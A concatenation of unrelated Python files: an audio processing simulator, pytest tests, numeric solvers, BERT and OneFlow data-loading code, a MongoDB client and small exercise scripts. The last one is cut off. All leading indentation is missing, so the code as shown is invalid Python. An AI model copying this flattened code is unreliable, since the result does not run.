# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
"""APM module simulator.
"""
import logging
import os
from . import annotations
from . import data_access
from . import echo_path_simulation
from . import echo_path_simulation_factory
from . import eval_scores
from . import exceptions
from . import input_mixer
from . import input_signal_creator
from . import signal_processing
from . import test_data_generation
class ApmModuleSimulator(object):
"""Audio processing module (APM) simulator class.
"""
_TEST_DATA_GENERATOR_CLASSES = (
test_data_generation.TestDataGenerator.REGISTERED_CLASSES)
_EVAL_SCORE_WORKER_CLASSES = eval_scores.EvaluationScore.REGISTERED_CLASSES
_PREFIX_APM_CONFIG = 'apmcfg-'
_PREFIX_CAPTURE = 'capture-'
_PREFIX_RENDER = 'render-'
_PREFIX_ECHO_SIMULATOR = 'echosim-'
_PREFIX_TEST_DATA_GEN = 'datagen-'
_PREFIX_TEST_DATA_GEN_PARAMS = 'datagen_params-'
_PREFIX_SCORE = 'score-'
def __init__(self, test_data_generator_factory, evaluation_score_factory,
ap_wrapper, evaluator, external_vads=None):
if external_vads is None:
external_vads = {}
self._test_data_generator_factory = test_data_generator_factory
self._evaluation_score_factory = evaluation_score_factory
self._audioproc_wrapper = ap_wrapper
self._evaluator = evaluator
self._annotator = annotations.AudioAnnotationsExtractor(
annotations.AudioAnnotationsExtractor.VadType.ENERGY_THRESHOLD |
annotations.AudioAnnotationsExtractor.VadType.WEBRTC_COMMON_AUDIO |
annotations.AudioAnnotationsExtractor.VadType.WEBRTC_APM,
external_vads
)
# Init.
self._test_data_generator_factory.SetOutputDirectoryPrefix(
self._PREFIX_TEST_DATA_GEN_PARAMS)
self._evaluation_score_factory.SetScoreFilenamePrefix(
self._PREFIX_SCORE)
# Properties for each run.
self._base_output_path = None
self._output_cache_path = None
self._test_data_generators = None
self._evaluation_score_workers = None
self._config_filepaths = None
self._capture_input_filepaths = None
self._render_input_filepaths = None
self._echo_path_simulator_class = None
@classmethod
def GetPrefixApmConfig(cls):
return cls._PREFIX_APM_CONFIG
@classmethod
def GetPrefixCapture(cls):
return cls._PREFIX_CAPTURE
@classmethod
def GetPrefixRender(cls):
return cls._PREFIX_RENDER
@classmethod
def GetPrefixEchoSimulator(cls):
return cls._PREFIX_ECHO_SIMULATOR
@classmethod
def GetPrefixTestDataGenerator(cls):
return cls._PREFIX_TEST_DATA_GEN
@classmethod
def GetPrefixTestDataGeneratorParameters(cls):
return cls._PREFIX_TEST_DATA_GEN_PARAMS
@classmethod
def GetPrefixScore(cls):
return cls._PREFIX_SCORE
def Run(self, config_filepaths, capture_input_filepaths,
test_data_generator_names, eval_score_names, output_dir,
render_input_filepaths=None, echo_path_simulator_name=(
echo_path_simulation.NoEchoPathSimulator.NAME)):
"""Runs the APM simulation.
Initializes paths and required instances, then runs all the simulations.
The render input can be optionally added. If added, the number of capture
input audio tracks and the number of render input audio tracks have to be
equal. The two lists are used to form pairs of capture and render input.
Args:
config_filepaths: set of APM configuration files to test.
capture_input_filepaths: set of capture input audio track files to test.
test_data_generator_names: set of test data generator names to test.
eval_score_names: set of evaluation score names to test.
output_dir: base path to the output directory for wav files and outcomes.
render_input_filepaths: set of render input audio track files to test.
echo_path_simulator_name: name of the echo path simulator to use when
render input is provided.
"""
assert render_input_filepaths is None or (
len(capture_input_filepaths) == len(render_input_filepaths)), (
'render input set size not matching input set size')
assert render_input_filepaths is None or echo_path_simulator_name in (
echo_path_simulation.EchoPathSimulator.REGISTERED_CLASSES), (
'invalid echo path simulator')
self._base_output_path = os.path.abspath(output_dir)
# Output path used to cache the data shared across simulations.
self._output_cache_path = os.path.join(self._base_output_path, '_cache')
# Instance test data generators.
self._test_data_generators = [self._test_data_generator_factory.GetInstance(
test_data_generators_class=(
self._TEST_DATA_GENERATOR_CLASSES[name])) for name in (
test_data_generator_names)]
# Instance evaluation score workers.
self._evaluation_score_workers = [
self._evaluation_score_factory.GetInstance(
evaluation_score_class=self._EVAL_SCORE_WORKER_CLASSES[name]) for (
name) in eval_score_names]
# Set APM configuration file paths.
self._config_filepaths = self._CreatePathsCollection(config_filepaths)
# Set probing signal file paths.
if render_input_filepaths is None:
# Capture input only.
self._capture_input_filepaths = self._CreatePathsCollection(
capture_input_filepaths)
self._render_input_filepaths = None
else:
# Set both capture and render input signals.
self._SetTestInputSignalFilePaths(
capture_input_filepaths, render_input_filepaths)
# Set the echo path simulator class.
self._echo_path_simulator_class = (
echo_path_simulation.EchoPathSimulator.REGISTERED_CLASSES[
echo_path_simulator_name])
self._SimulateAll()
def _SimulateAll(self):
"""Runs all the simulations.
Iterates over the combinations of APM configurations, probing signals, and
test data generators. This method is mainly responsible for the creation of
the cache and output directories required in order to call _Simulate().
"""
without_render_input = self._render_input_filepaths is None
# Try different APM config files.
for config_name in self._config_filepaths:
config_filepath = self._config_filepaths[config_name]
# Try different capture-render pairs.
for capture_input_name in self._capture_input_filepaths:
# Output path for the capture signal annotations.
capture_annotations_cache_path = os.path.join(
self._output_cache_path,
self._PREFIX_CAPTURE + capture_input_name)
data_access.MakeDirectory(capture_annotations_cache_path)
# Capture.
capture_input_filepath = self._capture_input_filepaths[
capture_input_name]
if not os.path.exists(capture_input_filepath):
# If the input signal file does not exist, try to create using the
# available input signal creators.
self._CreateInputSignal(capture_input_filepath)
assert os.path.exists(capture_input_filepath)
self._ExtractCaptureAnnotations(
capture_input_filepath, capture_annotations_cache_path)
# Render and simulated echo path (optional).
render_input_filepath = None if without_render_input else (
self._render_input_filepaths[capture_input_name])
render_input_name = '(none)' if without_render_input else (
self._ExtractFileName(render_input_filepath))
echo_path_simulator = (
echo_path_simulation_factory.EchoPathSimulatorFactory.GetInstance(
self._echo_path_simulator_class, render_input_filepath))
# Try different test data generators.
for test_data_generators in self._test_data_generators:
logging.info('APM config preset: <%s>, capture: <%s>, render: <%s>,'
'test data generator: <%s>, echo simulator: <%s>',
config_name, capture_input_name, render_input_name,
test_data_generators.NAME, echo_path_simulator.NAME)
# Output path for the generated test data.
test_data_cache_path = os.path.join(
capture_annotations_cache_path,
self._PREFIX_TEST_DATA_GEN + test_data_generators.NAME)
data_access.MakeDirectory(test_data_cache_path)
logging.debug('test data cache path: <%s>', test_data_cache_path)
# Output path for the echo simulator and APM input mixer output.
echo_test_data_cache_path = os.path.join(
test_data_cache_path, 'echosim-{}'.format(
echo_path_simulator.NAME))
data_access.MakeDirectory(echo_test_data_cache_path)
logging.debug('echo test data cache path: <%s>',
echo_test_data_cache_path)
# Full output path.
output_path = os.path.join(
self._base_output_path,
self._PREFIX_APM_CONFIG + config_name,
self._PREFIX_CAPTURE + capture_input_name,
self._PREFIX_RENDER + render_input_name,
self._PREFIX_ECHO_SIMULATOR + echo_path_simulator.NAME,
self._PREFIX_TEST_DATA_GEN + test_data_generators.NAME)
data_access.MakeDirectory(output_path)
logging.debug('output path: <%s>', output_path)
self._Simulate(test_data_generators, capture_input_filepath,
render_input_filepath, test_data_cache_path,
echo_test_data_cache_path, output_path,
config_filepath, echo_path_simulator)
@staticmethod
def _CreateInputSignal(input_signal_filepath):
"""Creates a missing input signal file.
The file name is parsed to extract input signal creator and params. If a
creator is matched and the parameters are valid, a new signal is generated
and written in |input_signal_filepath|.
Args:
input_signal_filepath: Path to the input signal audio file to write.
Raises:
InputSignalCreatorException
"""
filename = os.path.splitext(os.path.split(input_signal_filepath)[-1])[0]
filename_parts = filename.split('-')
if len(filename_parts) < 2:
raise exceptions.InputSignalCreatorException(
'Cannot parse input signal file name')
signal, metadata = input_signal_creator.InputSignalCreator.Create(
filename_parts[0], filename_parts[1].split('_'))
signal_processing.SignalProcessingUtils.SaveWav(
input_signal_filepath, signal)
data_access.Metadata.SaveFileMetadata(input_signal_filepath, metadata)
def _ExtractCaptureAnnotations(self, input_filepath, output_path,
annotation_name=""):
self._annotator.Extract(input_filepath)
self._annotator.Save(output_path, annotation_name)
def _Simulate(self, test_data_generators, clean_capture_input_filepath,
render_input_filepath, test_data_cache_path,
echo_test_data_cache_path, output_path, config_filepath,
echo_path_simulator):
"""Runs a single set of simulation.
Simulates a given combination of APM configuration, probing signal, and
test data generator. It iterates over the test data generator
internal configurations.
Args:
test_data_generators: TestDataGenerator instance.
clean_capture_input_filepath: capture input audio track file to be
processed by a test data generator and
not affected by echo.
render_input_filepath: render input audio track file to test.
test_data_cache_path: path for the generated test audio track files.
echo_test_data_cache_path: path for the echo simulator.
output_path: base output path for the test data generator.
config_filepath: APM configuration file to test.
echo_path_simulator: EchoPathSimulator instance.
"""
# Generate pairs of noisy input and reference signal files.
test_data_generators.Generate(
input_signal_filepath=clean_capture_input_filepath,
test_data_cache_path=test_data_cache_path,
base_output_path=output_path)
# Extract metadata linked to the clean input file (if any).
apm_input_metadata = None
try:
apm_input_metadata = data_access.Metadata.LoadFileMetadata(
clean_capture_input_filepath)
except IOError as e:
apm_input_metadata = {}
apm_input_metadata['test_data_gen_name'] = test_data_generators.NAME
apm_input_metadata['test_data_gen_config'] = None
# For each test data pair, simulate a call and evaluate.
for config_name in test_data_generators.config_names:
logging.info(' - test data generator config: <%s>', config_name)
apm_input_metadata['test_data_gen_config'] = config_name
# Paths to the test data generator output.
# Note that the reference signal does not depend on the render input
# which is optional.
noisy_capture_input_filepath = (
test_data_generators.noisy_signal_filepaths[config_name])
reference_signal_filepath = (
test_data_generators.reference_signal_filepaths[config_name])
# Output path for the evaluation (e.g., APM output file).
evaluation_output_path = test_data_generators.apm_output_paths[
config_name]
# Paths to the APM input signals.
echo_path_filepath = echo_path_simulator.Simulate(
echo_test_data_cache_path)
apm_input_filepath = input_mixer.ApmInputMixer.Mix(
echo_test_data_cache_path, noisy_capture_input_filepath,
echo_path_filepath)
# Extract annotations for the APM input mix.
apm_input_basepath, apm_input_filename = os.path.split(
apm_input_filepath)
self._ExtractCaptureAnnotations(
apm_input_filepath, apm_input_basepath,
os.path.splitext(apm_input_filename)[0] + '-')
# Simulate a call using APM.
self._audioproc_wrapper.Run(
config_filepath=config_filepath,
capture_input_filepath=apm_input_filepath,
render_input_filepath=render_input_filepath,
output_path=evaluation_output_path)
try:
# Evaluate.
self._evaluator.Run(
evaluation_score_workers=self._evaluation_score_workers,
apm_input_metadata=apm_input_metadata,
apm_output_filepath=self._audioproc_wrapper.output_filepath,
reference_input_filepath=reference_signal_filepath,
render_input_filepath=render_input_filepath,
output_path=evaluation_output_path,
)
# Save simulation metadata.
data_access.Metadata.SaveAudioTestDataPaths(
output_path=evaluation_output_path,
clean_capture_input_filepath=clean_capture_input_filepath,
echo_free_capture_filepath=noisy_capture_input_filepath,
echo_filepath=echo_path_filepath,
render_filepath=render_input_filepath,
capture_filepath=apm_input_filepath,
apm_output_filepath=self._audioproc_wrapper.output_filepath,
apm_reference_filepath=reference_signal_filepath,
apm_config_filepath=config_filepath,
)
except exceptions.EvaluationScoreException as e:
logging.warning('the evaluation failed: %s', e.message)
continue
def _SetTestInputSignalFilePaths(self, capture_input_filepaths,
render_input_filepaths):
"""Sets input and render input file paths collections.
Pairs the input and render input files by storing the file paths into two
collections. The key is the file name of the input file.
Args:
capture_input_filepaths: list of file paths.
render_input_filepaths: list of file paths.
"""
self._capture_input_filepaths = {}
self._render_input_filepaths = {}
assert len(capture_input_filepaths) == len(render_input_filepaths)
for capture_input_filepath, render_input_filepath in zip(
capture_input_filepaths, render_input_filepaths):
name = self._ExtractFileName(capture_input_filepath)
self._capture_input_filepaths[name] = os.path.abspath(
capture_input_filepath)
self._render_input_filepaths[name] = os.path.abspath(
render_input_filepath)
@classmethod
def _CreatePathsCollection(cls, filepaths):
"""Creates a collection of file paths.
Given a list of file paths, makes a collection with one item for each file
path. The value is absolute path, the key is the file name without
extenstion.
Args:
filepaths: list of file paths.
Returns:
A dict.
"""
filepaths_collection = {}
for filepath in filepaths:
name = cls._ExtractFileName(filepath)
filepaths_collection[name] = os.path.abspath(filepath)
return filepaths_collection
@classmethod
def _ExtractFileName(cls, filepath):
return os.path.splitext(os.path.split(filepath)[-1])[0]
|
"""Test the magic commands used to update variables and trace properties.
We expect the correct updates to be performed when a valid input is given, and the
correct warnings to be shown when an invalid one is.
"""
import pytest
from tests.unit.autoplot.mocks import COL, DF, DF_COL, DF_COL_ALT, VAR
@pytest.mark.parametrize("initial,final", [(VAR, "new"), (VAR, "my var"), (VAR, "m1 var!"), (DF_COL, "c")])
def test_rename_valid_names(initial, final, full_autoplot_magic):
magic = full_autoplot_magic()
magic.autoplot(f"--rename '{initial}' '{final}'")
# test label set to correct value
assert magic.view_manager.active_view._plotter[initial].get_label() == final
assert magic.view_manager.active_view._plotter._changed
def test_rename_dataframe(full_autoplot_magic):
initial = DF
final = "new"
magic = full_autoplot_magic()
magic.autoplot(f"--rename {initial} {final}")
# test label set to correct value
assert magic.view_manager.active_view._plotter[DF_COL].get_label() == DF_COL.replace(initial, final)
assert magic.view_manager.active_view._plotter[DF_COL_ALT].get_label() == DF_COL_ALT.replace(initial, final)
@pytest.mark.parametrize("initial", ["undef", "", COL])
def test_rename_undefined_variable(mock_toast, initial, full_autoplot_magic):
toast = mock_toast
magic = full_autoplot_magic(toast)
magic.autoplot(f"--rename '{initial}' new")
# test plotter not changed and toast show
assert not magic.view_manager.active_view._plotter._changed
toast.unrecognised_variable.assert_called_once_with(initial)
|
a=[1,34,45,23,47,56,32,24,13,67,98,90,77,76,3,2]
o=[]
e=[]
for i in range(0,len(a)):
if (a[i]%2==0):
e.append(a[i])
else:
o.append(a[i])
print("The odd values are",o)
print("The even values are",e)
print("ascending order of numbers: ")
e.sort()
o.sort()
print("EVEN NUMBERS",e)
print("ODD NUMBERS",o)
"""for i in range(0,len(o)-1):
if o[i]<o[i+1]:
# print(o[i])
print("")
else:
t=o[i]
o[i]=o[i+1]
o[i+1]=t
for i in range(len(o)):
print(o[i],end=" ")
print("\nascending order of even numbers: ")
for i in range(0,len(e)-1):
if e[i]<e[i+1]:
# print(e[i])
print("")
else:
t=e[i]
e[i]=e[i+1]
e[i+1]=t
for i in range(len(e)):
print(e[i],end=" ")
#print(o[i])
#print("The ascending of odd numbers: ",o)"""
|
import os
import numpy as np
import numpy
import sys
import tensorflow as tf
import dirt
import skimage.io
canvas_width, canvas_height = 960, 640
def get_dirt_pixels_render(render_op, par_dims=8):
square_vertices = tf.constant([[-1, -1, 0, 1], [-1, 1, 0, 1], [1, 1, 0, 1], [1, -1, 0, 1]], dtype=tf.float32)
background = tf.random_normal([canvas_height, canvas_width, 3], dtype=tf.float32)
dirt_op = getattr(dirt, render_op)
camera_pos = tf.placeholder(tf.float32, par_dims)
return dirt_op(
vertices=square_vertices,
faces=[[0, 1, 2], [0, 2, 3]],
vertex_colors=tf.ones([4, 3]),
background=background,
camera_pos = camera_pos,
height=canvas_height, width=canvas_width, channels=3
), camera_pos, background
def get_par_dims(render_op):
if render_op == 'oceanic_still_cloud':
par_dims = 9
else:
par_dims = 8
return par_dims
def main():
assert len(sys.argv) > 5
outdir = sys.argv[1]
prefix = sys.argv[2]
simple_render_op = sys.argv[3]
complex_render_op = sys.argv[4]
nvideos = int(sys.argv[5])
nframes_per_video = 30
framerate = 30
simple_par_dims = get_par_dims(simple_render_op)
complex_par_dims = get_par_dims(complex_render_op)
global canvas_width, canvas_height
if complex_render_op.startswith('ocean'):
canvas_width = 960
canvas_height = 540
nsamples = 100
else:
canvas_width = 1024
canvas_height = 768
nsamples = 1
render_par_vals = np.empty([nvideos, nframes_per_video, max(simple_par_dims, complex_par_dims)])
ans = get_dirt_pixels_render(simple_render_op, simple_par_dims)
simple_render_node = ans[0]
simple_camera_pos = ans[1]
ans = get_dirt_pixels_render(complex_render_op, complex_par_dims)
complex_render_node = ans[0]
complex_camera_pos = ans[1]
sess = tf.Session()
img = np.empty([canvas_height, canvas_width, 3])
feed_dict = {}
simple_camera_pos_val = np.empty(simple_par_dims)
complex_camera_pos_val = np.empty(complex_par_dims)
speed_max = np.zeros(6)
# x speed
speed_max[0] = 150.0
# y speed
speed_max[1] = 50.0
# z speed
speed_max[2] = 150.0
# ang1 speed
speed_max[3] = 0.1
# ang2 speed
speed_max[4] = 0.2
# ang3 speed
speed_max[5] = 0.1
speed_max /= 2
def h00(t):
return 2 * t ** 3 - 3 * t ** 2 + 1
def h10(t):
return t ** 3 - 2 * t ** 2 + t
def h01(t):
return -2 * t ** 3 + 3 * t ** 2
def h11(t):
return t ** 3 - t ** 2
for ind_v in range(nvideos):
ini_camera_pos_val = np.random.random(9)
ini_camera_pos_scale = np.array([1000, 500, 1000, 0.4, 2*np.pi, 0.4, 180, 2.0, 180])
ini_camera_pos_bias = np.array([0, 100, 0, -0.1, 0, -0.2, 0.0, 0.2, 0.0])
ini_camera_pos_val *= ini_camera_pos_scale
ini_camera_pos_val += ini_camera_pos_bias
ini_camera_pos_only = ini_camera_pos_val[:6]
speed1 = np.random.random(6) * 2.0 * speed_max - speed_max
speed2 = np.random.random(6) * 2.0 * speed_max - speed_max
mid_camera_pos_only = ini_camera_pos_only + speed1 * nframes_per_video / 2 / framerate
final_camera_pos_only = mid_camera_pos_only + speed2 * nframes_per_video / 2 / framerate
interp_p = [ini_camera_pos_only,
mid_camera_pos_only,
final_camera_pos_only]
interp_unscaled_m = [np.random.random(6) * 2.0 * speed_max - speed_max,
final_camera_pos_only - ini_camera_pos_only,
np.random.random(6) * 2.0 * speed_max - speed_max]
#interp_unscaled_m = [np.zeros(6), final_camera_pos_only - ini_camera_pos_only, np.zeros(6)]
for ind_f in range(nframes_per_video):
if ind_f < nframes_per_video / 2:
p0 = interp_p[0]
p1 = interp_p[1]
m0 = interp_unscaled_m[0] / (nframes_per_video)
m1 = interp_unscaled_m[1] / (nframes_per_video)
t = ind_f
else:
p0 = interp_p[1]
p1 = interp_p[2]
m0 = interp_unscaled_m[1] / (nframes_per_video)
m1 = interp_unscaled_m[2] / (nframes_per_video)
t = ind_f - nframes_per_video / 2
t_scale = nframes_per_video / 2
t /= t_scale
simple_camera_pos_val[:6] = h00(t) * p0 + \
h10(t) * m0 * t_scale + \
h01(t) * p1 + \
h11(t) * m1 * t_scale
complex_camera_pos_val[:6] = simple_camera_pos_val[:6]
simple_camera_pos_val[6] = ini_camera_pos_val[6] + ind_f / framerate
complex_camera_pos_val[6] = simple_camera_pos_val[6]
simple_camera_pos_val[7:] = ini_camera_pos_val[7:simple_par_dims]
complex_camera_pos_val[7:] = ini_camera_pos_val[7:complex_par_dims]
render_par_vals[ind_v, ind_f, :simple_par_dims] = simple_camera_pos_val[:]
render_par_vals[ind_v, ind_f, :complex_par_dims] = complex_camera_pos_val[:]
feed_dict[simple_camera_pos] = simple_camera_pos_val
img[:] = 0.0
for _ in range(nsamples):
dirt_pixels = sess.run(simple_render_node, feed_dict=feed_dict)
img += dirt_pixels
img /= nsamples
skimage.io.imsave(os.path.join(outdir, '%s_%05d_simple_%05d.png' % (prefix, ind_v, ind_f)), np.clip(img, 0.0, 1.0))
feed_dict[complex_camera_pos] = complex_camera_pos_val
img[:] = 0.0
for _ in range(nsamples):
dirt_pixels = sess.run(complex_render_node, feed_dict=feed_dict)
img += dirt_pixels
img /= nsamples
skimage.io.imsave(os.path.join(outdir, '%s_%05d_complex_%05d.png' % (prefix, ind_v, ind_f)), np.clip(img, 0.0, 1.0))
print(ind_v, ind_f)
np.save(os.path.join(outdir, '%s_camera_pos.npy' % prefix), render_par_vals)
if __name__ == '__main__':
main()
|
from subprocess import call
import sys
action = ['Greeting','Sitting','SittingDown','WalkTogether','Phoning','Posing','WalkDog','Walking','Purchases','Waiting','Directions','Smoking','Photo','Eating','Discussion']
group = [1, 2, 3, 5]
for i in action:
cmd = """nohup python -u run.py --model srnet -arc 1,1,1 --use-action-split True --train-action {} -mn sr_t1_crossaction_act{} > log/sr_t1_crossaction_act{}.log 2>&1&""".format(i,i,i)
print(cmd)
call(cmd, shell=True)
print('Finish!')
|
import numpy
def solve_tridiagonal_system(N, a, b, c, r):
"""Efficiently solve a tridiagonal system.
For example if,
x + y = 3
y + z = 5
y + 2z = 8
then,
A = 3x3
[ 1 1 0
0 1 1
0 1 2 ]
and r = [ 3, 5, 8 ]' for which the expected
result is x = [1, 2, 3].
>>> a, b, c = [None, 0, 1], [1, 1, 2], [1, 1, None]
>>> r =[3, 5, 8]
>>> print solve_tridiagonal_system(3, a, b, c, r)
[ 1. 2. 3.]
"""
u, gam = numpy.zeros(N), numpy.zeros(N)
bet = b[0]
if bet == 0.0:
raise RuntimeError, "Solve diagonal system error"
u[0] = r[0]/bet
for j in range(1, N):
gam[j] = c[j - 1]/bet
bet = b[j]- a[j]*gam[j]
if bet == 0.0:
raise RuntimeError, "Solve diagonal system error"
u[j] = (r[j] - a[j]*u[j - 1])/bet
for j in range(N - 2, -1, -1):
u[j] -= gam[j + 1]*u[j + 1]
return u
def solve_upper_diagonal_system(a, b):
"""Efficiently solve an upper diagonal system.
For example, if
A = 3 x 3
[ 1.75 1.5 -2.5
0 -0.5 0.65
0 0 0.25 ]
and
b = [ 0.5 -1 3.5],
the expected result is x = [2.97142857 20.2 14].
>>> from numpy import *
>>> A = matrix(array(
... [[1.75, 1.5, -2.5],
... [0.0, -0.5, 0.65],
... [0.0, 0.0, 0.25]], float))
>>> A
matrix([[ 1.75, 1.5 , -2.5 ],
[ 0. , -0.5 , 0.65],
[ 0. , 0. , 0.25]])
>>> b = array([0.5, -1.0, 3.5])
>>> b
array([ 0.5, -1. , 3.5])
>>> x = solve_upper_diagonal_system(A, b)
>>> x = matrix(x).transpose() # column vector
>>> x
matrix([[ 2.97142857],
[ 20.2 ],
[ 14. ]])
>>> A*x #matrix vector product
matrix([[ 0.5],
[-1. ],
[ 3.5]])
"""
if len(a.shape) <> 2:
raise RuntimeError, "Expected 'a' to be a matrix"
if a.shape[0] <> a.shape[1]:
raise RuntimeError, "Expected 'a' to be a square matrix"
if len(b.shape) <> 1:
raise RuntimeError, "Expected 'b' to be a column vector"
if b.shape[0] <> a.shape[0]:
raise RuntimeError, "Expected 'b' to be a column vector"
N = a.shape[0]
for i in range(N):
if a[i, i] == 0.0:
raise RuntimeError, "Singular upper diagonal matrix"
for j in range(0, i):
if a[i, j] <> 0.0: raise RuntimeError, "Matrix not upper diagonal"
x = numpy.zeros(N)
for i in range(N-1, -1, -1):
tmp = 0.0
for j in range(i+1, N):
tmp += a[i, j]*x[j]
x[i] = (b[i]-tmp)/a[i, i]
return x
def singular_value_decomposition_back_substitution(u, w, v, b):
"""Solve an upper diagonal system using svd.
For example, if
A = 3 x 3
[ 1.75 1.5 -2.5
0 -0.5 0.65
0 0 0.25 ]
and
b = [ 0.5 -1 3.5],
the expected result is x = [2.97142857 20.2 14].
>>> from numpy import *
>>> from numpy.linalg import svd
>>> A = matrix(array(
... [[1.75, 1.5, -2.5],
... [0.0, -0.5, 0.65],
... [0.0, 0.0, 0.25]], float))
>>> A
matrix([[ 1.75, 1.5 , -2.5 ],
[ 0. , -0.5 , 0.65],
[ 0. , 0. , 0.25]])
>>> b = array([0.5, -1.0, 3.5])
>>> b
array([ 0.5, -1. , 3.5])
>>> u, w, v = svd(A)
>>> x = singular_value_decomposition_back_substitution(u, w, v, b)
>>> x = matrix(x).transpose() # column vector
>>> x
matrix([[ 2.97142857],
[ 20.2 ],
[ 14. ]])
"""
if len(u.shape) <> 2:
raise RuntimeError, "Expected 'u' to be a matrix"
if len(w.shape) <> 1:
raise RuntimeError, "Expected 'w' to be a column vector"
if len(v.shape) <> 2:
raise RuntimeError, "Expected 'v' to be a matrix"
if len(b.shape) <> 1:
raise RuntimeError, "Expected 'b' to be a column vector"
m = u.shape[0]
n = u.shape[1]
if w.shape[0] <> n:
raise RuntimeError, "'w' column vector has incorrect size"
if b.shape[0] <> m:
raise RuntimeError, "'b' column vector has incorrect size"
if v.shape[0] <> n or v.shape[1] <> n:
raise RuntimeError, "'v' matrix has incorrect size"
tmp = numpy.zeros(n)
for j in range(n):
s = 0.0
if w[j] <> 0:
for i in range(m):
s += u[i, j]*b[i]
s /= w[j]
tmp[j] = s
x = numpy.zeros(n)
for j in range(n):
s = 0.0
for jj in range(n):
s += v[jj, j]*tmp[jj]
x[j] = s
return x
def _test():
import doctest
doctest.testmod()
if __name__ == '__main__':
_test()
|
'''
@author Tian Shi
Please contact tshi@vt.edu
'''
import json
import torch
from torch.autograd import Variable
from transformers import BertTokenizer
from .model_base import modelClassificationBase
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
class modelClassificationBaseBert(modelClassificationBase):
'''
Classfication.
Rewrite vocabulary module.
Use Bert encoder.
'''
def __init__(self, args):
super().__init__(args=args)
self.pretrained_models = {}
def build_vocabulary(self):
'''
vocabulary
'''
pass
def build_batch(self, batch_):
'''
get batch data
'''
len_review = []
review_arr = []
rating_arr = []
for line in batch_:
arr = json.loads(line)
rating_arr.append(int(arr['label']))
toks = tokenizer.encode(arr['text'])
len_review.append(len(toks))
review_arr.append(toks)
review_lens = min(self.args.review_max_lens, max(len_review))
review_arr = [itm[:review_lens] for itm in review_arr]
review_arr = [itm + [0 for _ in range(review_lens-len(itm))]
for itm in review_arr]
review_var = Variable(torch.LongTensor(review_arr))
rating_var = Variable(torch.LongTensor(rating_arr))
pad_mask = Variable(torch.FloatTensor(review_arr))
pad_mask[pad_mask != float(0)] = -1.0
pad_mask[pad_mask == float(0)] = 0.0
pad_mask = -pad_mask
attn_mask = Variable(torch.FloatTensor(review_arr))
attn_mask[attn_mask == float(101)] = 0.0
attn_mask[attn_mask == float(102)] = 0.0
attn_mask[attn_mask != float(0)] = -1.0
attn_mask[attn_mask == float(0)] = 0.0
attn_mask = -attn_mask
self.batch_data['input_ids'] = review_var.to(self.args.device)
self.batch_data['label'] = rating_var.to(self.args.device)
self.batch_data['attn_mask'] = attn_mask.to(self.args.device)
self.batch_data['pad_mask'] = pad_mask.to(self.args.device)
|
def pairs(k, arr):
"""Hackerrank Problem: https://www.hackerrank.com/challenges/pairs/problem
You will be given an array of integers and a target value. Determine the number of pairs of array elements that
have a difference equal to a target value.
Args:
k (int): The target difference
arr (list): list of integers
Returns:
int: number of pairs of integers whose difference is k
"""
vals = {i: 1 for i in arr}
count = 0
for i in arr:
try:
count += vals[i + k]
except KeyError:
pass
return count
if __name__ == "__main__":
assert pairs(2, [1, 5, 3, 4, 2]) == 3
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 27 18:32:12 2022
Autor: Carlos Armando De Castro (cadecastro.com)
"""
def interpolacion_lagrange(x,y,xi):
yi=0
N=len(x)
for i in range(0,N):
L=1
for j in range(0,N):
if j!=i:
L=L*(xi-x[j])/(x[i]-x[j])
yi=yi+L*y[i]
return yi
|
# Copyright 2015 Rackspace
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import pymongo
from pymongo import MongoClient
from cafe.common.reporting import cclogging
from cafe.engine.clients.base import BaseClient
class BaseMongoClient(BaseClient):
"""
@summary: Designed to be a simple interface to make calls to MongoDB
"""
FAILED = 'failed'
SUCCESS = 'success'
_log = cclogging.getLogger(__name__)
def __init__(self, hostname, db_name, username, password):
super(BaseMongoClient, self).__init__()
self.hostname = hostname
self.db_name = db_name
self.username = username
self.password = password
self.connection = None
self.db = None
@classmethod
def from_connection_string(cls, uri):
params = pymongo.uri_parser.parse_uri(uri)
hosts = params.get('nodelist')
if len(hosts) == 0:
raise Exception("Invalid connection string: {uri}".format(
uri=uri))
host, port = hosts[0]
return cls(hostname=host, db_name=params.get('database'),
username=params.get('username'),
password=params.get('password'))
def is_connected(self):
if self.connection:
return self.connection.alive()
return False
def connect(self, hostname=None, db_name=None):
"""
@summary: Connects to a server, but does not authenticate.
@param hostname: if not specified it'll attempt to use init hostname
@param db_name: if not specified it'll attempt to use init db_name
@return:
"""
if hostname is None:
hostname = self.hostname
if db_name is None:
db_name = self.db_name
self.connection = MongoClient(hostname)
self.db = self.connection[db_name]
result = 'Connected' if self.is_connected() else 'Failed to connect'
self._log.debug('{0} to MongoDB: {1}'.format(result, hostname))
return self.SUCCESS if self.is_connected() else self.FAILED
def disconnect(self):
self.connection.close()
self._log.debug('Disconnected from MongoDB')
def auth(self, username=None, password=None):
"""
@summary: Attempts to auth with a connected db. Returns FAILED if
there isn't an active connection.
@param username: if not specified it'll attempt to use init username
@param password: if not specified it'll attempt to use init password
@return:
"""
if not self.is_connected():
return self.FAILED
if username is None:
username = self.username
if password is None:
password = self.password
if username and password:
self.db.authenticate(name=username, password=password)
return self.SUCCESS
def find_one(self, db_obj_name, filter=None):
result_filter = filter or dict()
if not self.is_connected():
return self.FAILED
db_obj = self.db[db_obj_name]
return db_obj.find_one(result_filter)
def delete(self, db_obj_name, filter=None, just_one=True):
result_filter = filter or dict()
if not self.is_connected():
return self.FAILED
db_obj = self.db[db_obj_name]
return db_obj.remove(result_filter, just_one)
|
import oneflow
from oneflow.utils.data import Dataset
import cv2
import os
import glob
import random
class SelfDataSet(Dataset):
def __init__(self, data_path):
self.data_path = data_path
self.imgs_path = glob.glob(os.path.join(data_path, "*.png"))
def augment(self, image, flipcode):
flip = cv2.flip(image, flipcode)
return flip
def __getitem__(self, index):
image_path = self.imgs_path[index]
label_path = image_path.replace("image", "label")
image = cv2.imread(image_path)
label = cv2.imread(label_path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
